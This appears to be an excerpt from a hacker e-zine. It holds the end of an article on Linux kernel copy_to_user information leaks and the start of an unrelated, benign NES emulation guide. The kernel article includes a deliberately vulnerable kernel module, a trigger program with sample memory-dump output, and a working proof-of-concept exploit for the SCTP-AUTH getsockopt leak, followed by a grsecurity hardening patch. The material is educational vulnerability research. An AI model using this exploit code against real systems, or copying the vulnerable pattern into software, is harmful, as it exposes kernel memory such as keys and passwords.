is_global_init | | | | | +--> up_read | | | | | +--> congestion_wait | | | | | +-----------------------+ | +--> kmap_atomic | +--> memcpy | +--> kunmap | +--> set_page_dirty_lock | +--> put_page | +--> up_read | +--> movsl_is_ok | +--> __copy_user | +--> __copy_user_intel 4] Kernel Information Leaks The problem of this useful I/O function is that even a slight miscalculation at the number of the requested bytes can result in a huge leak from kernel memory. For example, an integer underflow which is later used as a size request will result in almost arbitrary read from kernel memory. This is neither a new vulnerability class nor a new concept. In addition to this, information leak bugs cannot directly lead to privilege escalation but in cases where the buggy code can literally GB of kernel memory there is a great chance of finding useful information in those. Those might include password entries, cryptographic keys etc. This is why kernel level information leaks are treated as highly critical vulnerabilities. From attacker's point of view, kernel information leaks have also the advantage of their effectiveness versus complexity. They're easy to spot and in most cases trivial to exploit. The following sections will deal with an sample bug and exploit as well as a real world one to demonstrate the vulnerability. 4.1] Exploitation Assuming the code of the following loadable kernel module (LKM), we can easily deduce that there is an information leak vulnerability in the call of copy_to_user routine. ------------------------------------------------------------------[snip]-------- /* * Extremely simple character device driver to demonstrate * copy_to_user() information leaks through IOCTL calls. * * by tping */ #include #include #include #include #include #define MAJOR_NUMBER 123 #define DEVFILE "bug" #define IOCTL_SET_LEN _IOR(MAJOR_NUMBER, 1, int) #define IOCTL_GET_LEAK _IOW(MAJOR_NUMBER, 2, char *) static size_t len = 0; static unsigned int opened = 0; static char *ptr = "blah"; /* prototypes */ static int open_the_bug(struct inode *, struct file *); static int close_the_bug(struct inode *, struct file *); int ioctl_handler(struct inode *, struct file *, unsigned int, unsigned long); int __init start_the_bug(void); void __exit kill_the_bug(void); struct file_operations fops = { .open = open_the_bug, .release = close_the_bug, .ioctl = ioctl_handler, }; static int open_the_bug(struct inode *in, struct file *fp) { if (opened) return -EBUSY; opened++; try_module_get(THIS_MODULE); return 0; } static int close_the_bug(struct inode *in, struct file *fp) { opened = 0; module_put(THIS_MODULE); return 0; } int ioctl_handler(struct inode *in, struct file *fp, unsigned int cmd, unsigned long args) { ptr = kmalloc(12, GFP_KERNEL); switch (cmd) { case IOCTL_SET_LEN: if (get_user(len, (char __user *)args)) return -EFAULT; printk(KERN_INFO "len is now %u\n", len); break; case IOCTL_GET_LEAK: printk(KERN_INFO "Leaking from 0x%p to 0x%p\n", ptr, (void *)args); if (copy_to_user((void __user *)args, ptr, len)) return -EINVAL; break; default: break; } return len; } int __init start_the_bug(void) { int ret = register_chrdev(MAJOR_NUMBER, DEVFILE, &fops); if (ret < 0) return ret; printk(KERN_INFO "Bug is up and running...\n" \ "Just execute: mknod /dev/%s c %d 0\n", DEVFILE, MAJOR_NUMBER); return 0; } void kill_the_bug(void) { printk(KERN_INFO "Bye bye little bug\n"); unregister_chrdev(MAJOR_NUMBER, DEVFILE); } module_init(start_the_bug); module_exit(kill_the_bug); MODULE_AUTHOR("tping"); MODULE_DESCRIPTION("dummy nfoleak bug"); MODULE_LICENSE("GPL"); ------------------------------------------------------------------[snip]-------- Keep an eye on your /var/log/kern.log and just insert the above kernel module to the running kernel like this: root:~# make -C /lib/modules/`uname -r`/build M=${PWD} modules make: Entering directory `/usr/src/linux-2.6.29' CC [M] /root/bug.o Building modules, stage 2. MODPOST 1 modules CC /root/bug.mod.o LD [M] /root/bug.ko make: Leaving directory `/usr/src/linux-2.6.29' root:~# insmod bug.ko root:~# Now, on your kernel warning log files you should see something similar to this: galvatron kernel: Bug is up and running... galvatron kernel: Just execute: mknod /dev/bug c 123 0 Just do what it says and in addition to that make sure that this file readable in order to be accessible to the unprivileged users that will attempt to abuse it. So... root:~# mknod /dev/bug c 123 0 root:~# chmod 0644 /dev/bug root:~# ls -l /dev/bug crw-r--r-- 1 root root 123, 0 2009-05-28 04:32 /dev/bug root:~# The last step is to code a tiny application that calls the driver's IOCTL commands and hopefully leaks some kernel data to the user space. Here is a simple trigger code for that driver. ------------------------------------------------------------------[snip]-------- /* * Example trigger code for copy_to_user * information leak demonstration. * * by tping * */ #include #include #include #include #include #include #include #include #define IOCTL_SET_LEN _IOR(123, 1, int) #define IOCTL_GET_LEAK _IOW(123, 2, char *) #define EVIL_SIZE 12 #define DEVICE "/dev/bug" #define DATAFILE "huhu.dump" #define FAIL -1 void fail(int s) { exit(EXIT_FAILURE); } int main(int argc, char *argv[]) { int fd1, fd2; size_t leak = EVIL_SIZE; char *ptr; int len = 0; signal(SIGSEGV, fail); if (argc == 2) leak = atoi(argv[1]); if ((fd1 = open(DEVICE, O_RDONLY)) == FAIL) { fprintf(stderr, "[-] Unable to open %s\n", DEVICE); exit(EXIT_FAILURE); } fprintf(stdout, "[+] Opened %s\n", DEVICE); ioctl(fd1, IOCTL_SET_LEN, &leak); fprintf(stdout, "[+] Set len to %u\n", leak); ptr = mmap(NULL, leak, PROT_READ | PROT_WRITE, \ MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); if (ptr == NULL) { fprintf(stderr, "[-] Unable to allocate %u bytes\n", leak); exit(EXIT_FAILURE); } fprintf(stdout, "[+] Allocated %u bytes at %p\n", leak, ptr); if ((fd2 = open(DATAFILE, O_RDWR | O_CREAT | O_TRUNC, 0666)) == FAIL) { fprintf(stderr, "[-] Unable to open %s\n", DATAFILE); exit(EXIT_FAILURE); } fprintf(stdout, "[+] Opened %s\n", DATAFILE); fprintf(stdout, "[+] Attempting to leak...\n"); len = ioctl(fd1, IOCTL_GET_LEAK, ptr); if (len == -1) { fprintf(stdout, "[-] Fail\n"); exit(EXIT_FAILURE); } if (write(fd2, ptr, len) == -1) { perror("[-] Dumping the data"); exit(EXIT_FAILURE); } close(fd1); close(fd2); free(ptr); return 0; } ------------------------------------------------------------------[snip]-------- An unprivileged user can obtain kernel memory because of this insecure usage of copy_to_user simply by invoking the IOCTL commands as shown in the above code. For example... tping:~$ gcc -Wall abuse_it.c -o abuse_it tping:~$ ./abuse_it 120 [+] Opened /dev/bug [+] Set len to 120 [+] Allocated 120 bytes at 0x5606c000 [+] Opened huhu.dump [+] Attempting to leak... tping:~$ ls -l huhu.dump -rw-r--r-- 1 tping tping 120 2009-05-28 04:47 huhu.dump tping:~$ hexdump -C huhu.dump 00000000 d0 56 43 f7 cc 2d 85 f8 34 09 43 f7 00 00 00 00 |.VC..-..4.C.....| 00000010 a8 56 43 f7 4c 6a 48 f7 00 03 00 00 00 00 00 00 |.VC.LjH.........| 00000020 60 00 2e f7 40 92 4f f7 c9 50 87 c0 94 01 7c f7 |`...@.O..P....|.| 00000030 94 01 7c f7 00 00 00 00 00 00 00 00 ff ff ff ff |..|.............| 00000040 00 01 00 00 00 90 8b f7 20 b8 8c f6 00 b8 8c f6 |........ .......| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000060 c8 4f 87 c0 de 4f 87 c0 d4 4f 87 c0 2c cf 80 c0 |.O...O...O..,...| 00000070 00 00 00 00 00 00 00 00 |........| 00000078 tping:~$ And your kernel log file responsible for the warning level messages will have some information from our driver. galvatron kernel: len is now 120 galvatron kernel: Leaking from 0xf6e42e00 to 0x5606c000 This is just an example to demonstrate the vulnerabilities that can occur from a seemingly innocent I/O routine. Depending on the kernel configuration and the susceptible kernel code those information leaks can result in up to giga-bytes of kernel memory being leaked. Clearly with a huge security impact. In addition to miscalculations that lead to such situations, another popular mistake is when the attacker is able to influence some allocation in the kernel side using kmalloc() in order to request 0 bytes to be allocated. In the majority of the kmalloc() return value checks the code looks like: some_ptr = kmalloc(some_len, GFP_KERNEL); if (!some_ptr) return -ENOMEM; Even though this looks accurate, kmalloc treats zero allocation in a special way, different than any other allocation. That is, it does not return a NULL pointer, but instead it returns ZERO_SIZE_PTR. You can verify this fairly easily by a quick look at include/linux/slab_def.h, include/linux/slub_def.h or include/linux/slob_def.h where kmalloc is defined (depending on the allocator) and has a check for zero allocations. ------------------------------------------------------------------[snip]-------- include/linux/slub_def.h: 212 static __always_inline void *kmalloc(size_t size, gfp_t flags) 213 { ... 218 if (!(flags & SLUB_DMA)) { 219 struct kmem_cache *s = kmalloc_slab(size); 220 221 if (!s) 222 return ZERO_SIZE_PTR; 223 224 return kmem_cache_alloc(s, flags); 225 } ... 228 } include/linux/slab_def.h: 31 static inline void *kmalloc(size_t size, gfp_t flags) 32 { 33 if (__builtin_constant_p(size)) { 34 int i = 0; 35 36 if (!size) 37 return ZERO_SIZE_PTR; ... 56 } include/linux/slob_def.h: 26 static inline void *kmalloc(size_t size, gfp_t flags) 27 { 28 return __kmalloc_node(size, flags, -1); 29 } mm/slob.c: 462 void *__kmalloc_node(size_t size, gfp_t gfp, int node) 463 { ... 467 if (size < PAGE_SIZE - align) { 468 if (!size) 469 return ZERO_SIZE_PTR; ... 487 } ------------------------------------------------------------------[snip]-------- And that constant being returned (ZERO_SIZE_PTR) can bypass checks like: if (!ptr) Since its value is a pointer to 16 as we can read from include/linux/slab.h Even though kfree() handles this special pointer exactly the same as with NULL, it can lead to information leaks (as well as pointer dereferences but this is off topic) because of its value and since most developers will only check for NULL being returned. 4.2] CVE-2008-3792: SCTP-AUTH API CVE-2008-3792 is a bug which was released by Tobias Klein on 9 September 2008 and affects Linux kernel prior to 2.6.26.4 [4]. Tobias Klein wrote an excellent analysis of this vulnerability. But here is a quick outline of the buggy IOCTL call. ------------------------------------------------------------------[snip]-------- 5175 SCTP_STATIC int sctp_getsockopt(struct sock *sk, int level, int optname, 5176 char __user *optval, int __user *optlen) 5177 { 5178 int retval = 0; 5179 int len; ... 5197 if (get_user(len, optlen)) 5198 return -EFAULT; ... 5303 case SCTP_HMAC_IDENT: 5304 retval = sctp_getsockopt_hmac_ident(sk, len, optval, optlen); 5305 break; ... 5323 return retval; 5324 } ------------------------------------------------------------------[snip]-------- The length argument passed to sctp_getsockopt_hmac_ident() is completely user controlled from line 5197. Now, the latter function include this code: ------------------------------------------------------------------[snip]-------- 5053 static int sctp_getsockopt_hmac_ident(struct sock *sk, int len, 5054 char __user *optval, int __user *optlen) 5055 { 5056 struct sctp_hmac_algo_param *hmacs; ... 5059 hmacs = sctp_sk(sk)->ep->auth_hmacs_list; 5060 param_len = ntohs(hmacs->param_hdr.length); 5061 5062 if (len < param_len) ... 5066 if (copy_to_user(optval, hmacs->hmac_ids, len)) 5067 return -EFAULT; ... 5070 } ------------------------------------------------------------------[snip]-------- A malicous user can specify a length argument which bypasses the check at line 5062 and reaches the copy_to_user() routine which can result in an information leak situtation as it is described earlier in this document. Here is a simple proof of concept code for this vulnerability. ------------------------------------------------------------------[snip]-------- /* * Simple PoC code for CVE-2008-4113 * by tping */ #include #include #include #include #include #include #include #include #include #include #include #define PROCFILE "/proc/sys/net/sctp/auth_enable" #define SCTP_HMAC_IDENT 22 #define LEAK_SIZE 0x20000 #define OUTFILE "sctp-auth.dmp" void check_sctp_auth() { /* * Unfortunately there is no SCTP_NET_AUTH_ENABLE * sysctl to check this directly using a common * sysctl(2) call. I'm checking it through procfs. * Not such realiable since it might be -r to us. */ char buf[10]; int fd = open(PROCFILE, O_RDONLY); if (fd == -1) { printf("[-] SCTP-AUTH detection failed.\n" \ " [*] Continuing anyway...\n"); return; } memset(buf, 0, sizeof(buf)); if (read(fd, buf, 3) == -1) { printf("[-] SCTP-AUTH detection failed.\n" \ " [*] Continuing anyway...\n"); return; } if (buf[0] == '0' && buf[1] == '\n') { printf("[-] SCTP-AUTH Disabled.\n"); exit(EXIT_FAILURE); } else if (buf[0] != '0' && buf[1] == '\n') { printf("[+] SCTP-AUTH Enabled!\n"); return; } close(fd); return; } int main(int argc, char *argv[]) { check_sctp_auth(); int fd = -1; void *ptr; size_t leak = LEAK_SIZE; if (argc > 1) leak = atoi(argv[1]); ptr = mmap(NULL, leak, PROT_READ | PROT_WRITE, \ MAP_ANON | MAP_PRIVATE, -1, 0); if (ptr == MAP_FAILED) { perror("[-] Memory mapping failed"); exit(EXIT_FAILURE); } memset(ptr, 'X', leak); printf("[+] Got space for %u bytes at 0x%08x\n", leak, ptr); if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) == -1) { perror("[-] SCTP socket"); exit(EXIT_FAILURE); } printf("[+] SCTP is ready.\n"); if (getsockopt(fd, SOL_SCTP, SCTP_HMAC_IDENT, ptr, &leak) == -1) { perror("[-] Infoleak failed"); exit(EXIT_FAILURE); } printf("[+] You got your kernel data...\n"); close(fd); if ((fd = open(OUTFILE, O_RDWR | O_CREAT | O_TRUNC, 0666)) == -1) { perror("[-] Dumping to file"); exit(EXIT_FAILURE); } printf("[+] Dumping data to file %s\n", OUTFILE); if (write(fd, ptr, leak) == -1) { perror("[-] Dumping the data"); exit(EXIT_FAILURE); } close(fd); munmap(ptr, leak); printf("[+] Well done.\n"); return 0; } ------------------------------------------------------------------[snip]-------- The only difference from the example buggy code presented at section 4.1 was roughly that this code was dealing with an option that could be disabled (net.sctp.auth_enable) and it had to perform an additional check for this. The rest of the code performs almost the exact same tasks as the previous one. Of course, here the leak is through getsockopt(2) system call where on the previous example was through an ioctl(2) call. 5] Fixing the bug So is this a bug? It definitely looks like a design flaw, and in fact it will be patched (or at least hardened) by spender at one of his patches [5] for grsecurity. In his patch, a new reporting function is added for copy_to_user() information leaks like this: ------------------------------------------------------------------[snip]-------- void pax_report_leak_to_user(const void *ptr, unsigned long len) { printk(KERN_ERR "PAX: kernel memory leak attempt detected from %p (%lu bytes)\n", ptr, len); dump_stack(); do_group_exit(SIGKILL); } ------------------------------------------------------------------[snip]-------- This is added in fs/exec.c and __copy_to_user() gets patched to include a new check which is shown below. ------------------------------------------------------------------[snip]-------- } + if (!__builtin_constant_p(n)) + check_object_size(from, n, true); return __copy_to_user_ll(to, from, n); } ------------------------------------------------------------------[snip]-------- This check_object_size() is also a new function added in mm/slab.c and it is used to identify that the size of buffer 'from' is more than the requested bytes to be copied. Here is his code: ------------------------------------------------------------------[snip]-------- void check_object_size(const void *ptr, unsigned long n, bool to) { struct page *page; if (!n) return; if (ZERO_OR_NULL_PTR(ptr)) goto report; if (!virt_addr_valid(ptr)) return; page = virt_to_head_page(ptr); if (!PageSlab(page)) /* TODO: check for stack based ptr */ return; size = obj_size(virt_to_cache(ptr)); if (n > size) goto report; /* TODO: figure out how to find beginning of object if ptr is inside one */ return; report: if (to) pax_report_leak_to_user(from, n); else pax_report_overflow_from_user(from, n); } EXPORT_SYMBOL(check_object_size); ------------------------------------------------------------------[snip]-------- It would be ridiculus to describe all of the above routines since this is just a reference to a possible fix. This code is used to handle both copy_to_user() infoleaks and copy_from_user() overflows as you can see from the correponding report functions at the boolean variable 'to' which if is set to true it represents that this is a copy_to_user() and on false, a copy_from_user(). Of course, the Linux kernel developers have never even attempted to perform something like the above fix that spender did. :-P 6] Conclusion Nowadays, the use of this routine is limited to specific operations which can be easily audited for such security bugs. Nevertheless, there are still some similar cases in various kernel codes. Of course, even though information leaks usually cannot lead into direct privilege escalation, they can definitely assist on a complete compromise or any further exploitation. 7] References 1] Kernel-Level Exception Handling http://tldp.org/LDP/khg/HyperNews/get/devices/exceptions.html 2] 2.6.29 Linux kernel source code http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.29.tar.gz 3] Preemption under Linux http://kernelnewbies.org/FAQ/Preemption 4] Linux Kernel SCTP-AUTH API Information Disclosure Vulnerability and NULL Pointer Dereferences http://trapkit.de/advisories/TKADV2008-007.txt 5] copy_*_user GRSecurity protection http://www.grsecurity.net/~spender/copy_tofrom_user_protection_26.diff [==============================================================================] [--------------[ The Software Emulation of the NES Architecture ]--------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### ################ qeed *############* "T######T" --------------------[Table of Contents]----------------------------------- I. Introduction II. ROMs/INES/UNIF III. CPU (Central Processing Unit) IV. PPU (Picture Processing Unit) V. APU (Audio Processing Unit) VI. Miscellaneous VII. Thanks -------------------------------------------------------------------------- I. Introduction This document is intended to introduce the basics of the NES architecture, with the main focus on how to emulate such a console on the software side. Supplementary links will be provided at the end for anyone who wanted the hardware side of the NES. The code and optimization tricks presented in this article will be mainly C and assembly, although it should be easily ported to other languages. The information in this article will try to cover the base NES hardware, and only the base. The peripherals will be provided external links for those who wish to learn more. The reasons I wanted to write this document was to cover all the latest information that was discovered over the years about the NES. Many of documents about the NES nowadays are sorely outdated, and some even outright wrong. I want to give thanks to the people such as Brad Taylor, blargg, kevtris, loopy, quietust, disch, and the all the other members of the NESDEV community for writing about and discovering all the new things about the NES. Emulation couldn't have been this accurate without all of your contributions! -------------------------------------------------------------------------- II. ROMs/INES/UNIF First and foremost, the main use of console emulators besides the intellectual pursuit is to play video games. ROMs are the back up images you get from the game board that has been dumped by a cartridge reader, for the NES, the main dumper is the CopyNES. Now due to the NES limited hardware, the NES game cartridge contains extra hardware that extends the capabilities of the NES hardware, such as sound chips, RAM, and banks that allow more ROM space for code. These extra hardware add-ons can be controlled by writing to memory-mapped registers, and each hardware cartridge had different registers. Of this fact, the INES header was born. The INES header was a format invented by Marat Fayzullin to classify the type of cartridge one would be reading when opening the ROM file. The current INES specification is 16 bytes of header file, following then the optional trainer if the file has one, a small chunk of code for a cheat screen mainly, the PRG-ROM, the game code, and then the CHR-ROM, the graphics data, at the end there is also the playchoice (8kb of hint screen) at the end after CHR-ROM if the flag for it is set. The UNIF format was created later to provide more accurate information about the game cartridge, using full board names of the cartridge instead of assigning a number for it, it is also a chunked format based, allowing alot more flexibility in updating the standard, though UNIF never widely caught on, and most dumped games uses the INES header format, so for emulating the NES, implementing INES should be sufficient for most games. The game cartridge are classified with "mapper" numbers in INES and board names in UNIF. +++++++++++++++++++++++++INES header++++++++++++++++++++++++++++++++++++++ Here is the INES data format taken from nesdevwiki: header[0, 3] = "NES\x1a" the header string identifying a INES ROM. the 0x1A is the MS-DOS end of line terminator. header[4] = The number of PRG-ROM inside the file (0x4000 * header[4]) bytes. header[5] = The number of CHR-ROM inside the file (0x2000 * header[5]) bytes. header[6] = 76543210 |||||||| ||||+||+- 0xx0: horizontal mirroring; 0xx1: vertical mirroring; 1xxx: four-screen mirroring |||| |+-- 1: SRAM in CPU $6000-$7FFF, if present, is battery backed |||| +--- 1: 512-byte trainer at $7000-$71FF (stored before PRG data) ++++----- Lower nybble of mapper number header[7] = 76543210 |||| || |||| |+- VS Unisystem |||| +-- PlayChoice-10 (8KB of Hint Screen data stored after CHR data) ++++----- Upper nybble of mapper number header[8] = Size of PRG RAM in 8 KB units (Value 0 implies 8 KB for compatibility; see PRG RAM circuit) header[9] = 76543210 |||||||| |||||||+- TV system (0: NTSC; 1: PAL) +++++++-- Reserved, set to zero Not alot of emulator adheres to this, and many if not all ROMs dumped do not use this flag. header[10] = 76543210 || || || ++- TV system (0: NTSC; 2: PAL; 1/3: dual compatible) |+----- SRAM in CPU $6000-$7FFF is 0: present; 1: not present +------ 0: Board has no bus conflicts; 1: Board has bus conflicts header[10] is unofficial from the INES spec, if you want to adhere to the spec, treat header[10] as unused (zero-filled). header[11,15] are unused (zero-filled). After this, there is a 512 bytes trainer if bit 2 of header 6 is set, and then header[4] * 16384 bytes of PRG-ROM, then header[5] * 8192 of CHR-ROM, and 8192 bytes of PlayChoice-10 data at after the CHR-ROM. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++UNIF Header Format++++++++++++++++++++++++++++++++++ Here is the UNIF header format taken from nesdevwiki: header[0, 3] = "UNIF" identifer header[4, 7] = What version of the UNIF we are dealing with header[8, 31] = Reserved. From then there is string identfiers saying what data comes next here is the chunk idenfitier format. 00-03: Chunk ID string, ASCII text 04-07: Chunk data length, DWORD 08-..: Chunk data Here is the string identifier in alphabetical format: "BATR" Length=1 byte Revision=5 Recommended in file Indicates that the board contains a battery used to preserve the contents of its expansion RAM. "CCK#" where # is a number Length=4 bytes Revision=5 Optional in the file "CCK0" to "CCKF" contains CRC32 checksums which verifies if the data has been dumped properly. "CHR#" where # is a number Length=variable size Revision=4 "CHR0" is required, all others are optional, only if the game has CHR-ROM. "CHR0" to "CHRF" contain the CHR-ROM data of the game cartridge. If more than 1 CHR ROM chip is present on the cartridge board, one chunk should be used for each chip, arranged in the logical order in which they are addressed via the mapper hardware. Most cartridges will only use "CHR0". "CTRL" Length=1 byte Revision=7 Optional in the file. A bitfield containing information about the controllers used by the game. * Bit 0: Regular Joypad * Bit 1: Zapper * Bit 2: R.O.B * Bit 3: Arkanoid Controller * Bit 4: Power Pad * Bit 5: Four-Score adapter * Bit 6: (expansion) * Bit 7: (expansion) "DINF" Length=204 bytes Revision=2 Optional in the file This tells you who dumped the block 100 bytes - NULL-terminated string of the name of the person who dumped it. 1 byte - dump date (day) 1 byte - dump date (month) 2 byte - dump date (year) 100 bytes - NULL-terminated string of software used to dump it "NAME" Length=variable Revision=1 Optional in file NULL-terminated string of the name of the game. "MAPR" Length=variable size Revision=1 Required in the file The data is a NULL-terminated string describing what boards are used, for more accuracy than the INES mapper numbers. "MIRR" Length=1 byte Revision=5 Recommended in file Describes how name tables is configured, because in many cases, the board name alone cannot indicate what name table configuration is used. The byte value indicates the mirroring. 0 - Horizontal Mirroring 1 - Vertical Mirroring 2 - Mirror All Pages From $2000 3 - Mirror All Pages From $2400 (deprecated, as it is indistinguishable from option 2 above) 4 - Four Screens of VRAM 5 - Mirroring Controlled By Mapper Hardware (necessary for some MMC3 boards) "PCK#" where # is a number Length=4 bytes Revision=5 Optional in the file This is CRC32 checksum for the "PRG#" data to see if they match. "PRG#" where # is a number Length=variable Revision=4 "PRG0" is required, all other are optional "PRG0" to "PRGF" contain the PRG-ROM data of the game cartridge. If more than 1 PRG ROM chip is present on the cartridge board, one chunk should be used for each chip, arranged in the logical order in which they are addressed via the mapper hardware. Most cartridges will only use "PRG0". "READ" Length=variable size Revision=1 Optional in the file This is extra content in the file, such as who dumped it, credits, greets, or anything of the sort. "TVCI" Length=1 byte Revision=6 Recommended in the file This tells you the TV compatibility 0 in the byte for NTSC (60 Hz) 1 in the byte for PAL (50 Hz) 2 in the byte is for multi region. "VROR" Length=1 byte Revision=5 Optional in file Indicates that a mapper which normally supports only CHR ROM is being made to use CHR RAM instead, intended for homebrew games which use boards such as NES-NROM-256 or NES-MHROM with CHR RAM instead of CHR ROM. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ For the current specs of the INES and UNIF header format, visit http://nesdevwiki.org/wiki/INES http://nesdevwiki.org/wiki/UNIF -------------------------------------------------------------------------- -------------------------------------------------------------------------- III. CPU (Central Processing Unit) The NES hardware came in 2 formats, NTSC and PAL. The NTSC CPU is clocked at ~1.789772 MHz using the Ricoh 2A03, a MOS 6502 implementation, while the PAL is clocked at ~1.662607 MHz Ricoh 2A07 which is also a MOS 6502 implementation. The CPU's clock is obtained by dividing a 21.477272 MHz master clock source by 12 (26.601712 MHz divided by 16 for PAL). The only difference from the MOS 6502 is the NES didn't have a decimal mode. For those that don't know, the NES is little endian. ++++++++++++++++++++++++++Registers+++++++++++++++++++++++++++++++++++++++ The M6502 is a very simple 8 bit CPU, with a few registers for operations, all of size 8 bit, except for the program counter. Here are the registers: The Accumulator: The accumulator is mainly used for math operations, since it is the only register with opcodes that allow addition and subtraction to. The X and Y register: They are general purpose registers used for loops or moving data, they are also used to implement pointers in the NES. The Stack Pointer: The stack pointer is an index used to keep track of where it is in the stack range. The Stack pointer wraps around to 0xFF if a push happens when it is 0x00 and the other way around when a pop happens. The Status Flag: The status flag keeps track of the CPU state, such when there was an arithmetic overflow, or the last operation obtained 0 to a register. It is mainly used to implement conditional branches and mask IRQs. Here is the bit inder for the status flag: ========================== Carry (0x01): Set when addition carries or subtraction carries, the shift instructions also use this bit, and the compare instruction uses it too, and some undocumented opcodes. Zero (0x02): Set when A, X, or Y operation gave a value of 0 to one of those registers, unset when it is not 0. Interrupt (0x04): Set when it is in interrupt, when this is set, the other interrupts are masked. Decimal Mode (0x08): Unused, NES doesn't have decimal mode, but the opcodes CLD and SED still sets the flag as normal, just that the other operations doesn't care if the decimal is set or not. BRK (0x10): Not really a flag, since can't be manually set, set when the BRK instruction is used. Unused (0x20): Not really a flag, since can't be manually set, set when the the status register gets pushed onto the stack. Overflow (0x40): Set on signed overflow. For example, when negative + negative equals positive, positive + positive equals negative. Sign (0x80): Set when A, X, or Y operation gave a value that has 7th bit (0x80) set, clear otherwise. =========================== The Program Counter: The program counter is a 16 bit register used to keep track of where the CPU is executing the opcodes, it wraps around to 0, if it passes the 0xFFFF mark. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++CPU Memory Map+++++++++++++++++++++++++++++++++++ Each element in the address are 8 bits wide (byte). RAM: [0, 0x1FFF] The address lines 0x800-0x1FFF is mirrored with 0-0x7FF, thus the RAM is really RAM[index & 0x7FF] when accessing RAM[0-0x1FFF]. Zero Page: [0, 0xFF] This address lines is one of the most used address space in the NES, due to opcodes existing that deal specifically with this space. It saves a cycle count (Since it doesn't need to get the high byte of the program counter) for the instructions, for a limited console such as the NES, every cycles counts. Stack: [0x100, 0x1FF] This is where the stack instructions push/pops the data in the 6502, the index (stack pointer register) wraps around when a push or pop is greater than than the defined range. PPU: [0x2000, 0x3FFF] [0x4014] These are memory mapped registers to interact with the PPU, they are used to read the PPU status, and to read/write memory to. They will be covered more in detailed in the PPU section. They are mirrored every 8 bytes so assuming the addr[0] is 0x2000 and on, the access operation will be it will be addr[index & 0x07]. The 0x4014 address is used for quick transferring of 256 bytes (DMA) to the sprite memory space covered in the PPU section. APU: [0x4000, 0x4017] aside from [0x4016] and [0x4014] These are memory mapped registers to interact with the APU, such as setting frequency or volume. These will be covered more in depth in the APU section. Various: [0x4018, 0x7FFF] These are open bus, unless the game cartridge has hardware that maps to these registers. Generally, if a game does, 0x4018 to 0x5FFF are memory mapped addresses, and the 0x6000 to 0x7FFF is usually the extra RAM and that space is usually the save RAM on the cartridge. Each different game cartridge has different mappings, so don't take what I just said to be exact for all games. Note about CPU open bus: Open bus is registers which haven't been implemented. Some games uses open bus to hinder playability on pirate NES, due to implementation differences. Writing to open bus does nothing, while reading from open bus returns the byte last on the bus. The open bus behavior is different than the PPU/APU. ===================== Example: LDA $5000 (load accumulator with the value at address 0x5000), because the NES is little endian, 0x50 will be read last. Thus the accumulator will be 0x50 after the instruction. ====================== PRG-ROM: [0x8000, 0xFFFF] This is the game code that is mapped from the ROM file we load into this range. Due to the limited ROM space that could map here, most games have bankswitching support by writing to a memory mapped register. RESET Vector: [0xFFFC-0xFFFD] The RESET address that the PC uses on startup and on reset triggered by the reset button on the NES. Example: PC = mem_read(0xFFFC)|(mem_read(0xFFFD)<<8); NMI Vector: [0xFFFA-0xFFFB] The NMI (Non Maskable Interrupt) address that the NMI handler read from to get the address to the NMI code. Example: PC = mem_read(0xFFFA)|(mem_read(0xFFFB)<<8); IRQ Vector: [0xFFFE-0xFFFF] The IRQ (Interrupt ReQuest) address is where the IRQ handler read from to get the address to the IRQ code. Example: PC = mem_read(0xFFFE)|(mem_read(0xFFFF)<<8); ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++Power-up State++++++++++++++++++++++++++++++++ Power-up State: The power up state is different with each NES, and therefore, no standard can be reached. However, a power state has been recorded on a real NES, while it is not the official, it does show a sample of what would a real NES power up state be. You can find it at: http://nesdevwiki.org/wiki/Power-up_state_of_PPU http://nesdevwiki.org/wiki/Power-Up_State Generally, most emulators nowadays set them close to the power state documented above, whereas old emulators zero them out. A note of use, reflect what you have in the power-up state, in the P register, that is if you have 0 in flags A, X, or Y, set the Z flag. The stack pointer should be set by games on startup, generally in the form of ( LDX #$FF; TXS; ) so you can leave it to whatever value you want, although it is convention to leave it 0xFD or 0xFF indicating the stack is free. The unused bit (0x20) does not exist in the register flag, but what happens is that when NMI/IRQ/BRK/PHP gets used and the status flag gets pushed onto the register, the unused bit always gets pushed onto the stack as 1. Most games first instruction is a SEI, which sets the interrupt bit to mask any interrupts that would happen, but setting the interrupt bit on power on wouldn't hurt. The PC is set to the RESET vector address upon startup. For ROMs that only have 1 PRG Bank upon load up, (0x4000 bytes), it is copied to address 0x8000 and addr[0xC000] contains the same things that addr[0x8000]. That is for ROMs with 1 PRG bank, if there are 2 or more, then it depends on what kind of cartridge the game is. Example: MMC1 (INES mapper #1) loads addr[0x8000, 0xBFFF] with the first PRG bank, and addr[0xC000, 0xFFFF] with the last PRG bank of the file. Once it reads the RESET vector and jump to the address inside the RESET vector, it starts decoding the instructions at the address and the fun begins. For the RAM, there are some pirate carts out there that assumes some location in the RAM is 0, and will have code that depends on those locations being 0, and most games zero out the RAM on start-up, it is recommended you set the RAM[0, 0x800] to 0 on start-up, though it should remain unchanged during a soft reset. For the PPU, the scrolling latch is set/unset based on your conditional code (covered in the PPU section, it's the latch for 0x2005 and0x2006), and games should set the PPU regs to their liking, but you can set them reflecting the power up state of the PPU from the link above. As for the APU, treat them as if they were running in some existing state, for example, assuming we set every APU registers to 0, we would run the APU in that condition at startup, that means the timers (covered later) would be 2 for pulse wave, 1 for triangle etc. There are some quirks that is covered in the links above saying how some registers doesn't work within X amount of cycles, this is why games usually wait at least 1 frame before starting any PPU code, you don't have to implement this if you don't want, this behavior is probably different on every NES, though you could, forcing homebrew game authors who someday might use your emulator to learn that they can't use those registers before a certain time is reached, but aside from that, the extra code doesn't really help it having more compatibility. On soft restart (using the button restart), the PC register is read twice, then the program counter gets pushed on to the stack, hi-nibble first, then the status register gets pushed (the unused flag doesn't seem to be set when pushed here) and the interrupt flag is set, then the program counter is loaded with the RESET vector. As you can see, the registers do not get reset or anything. 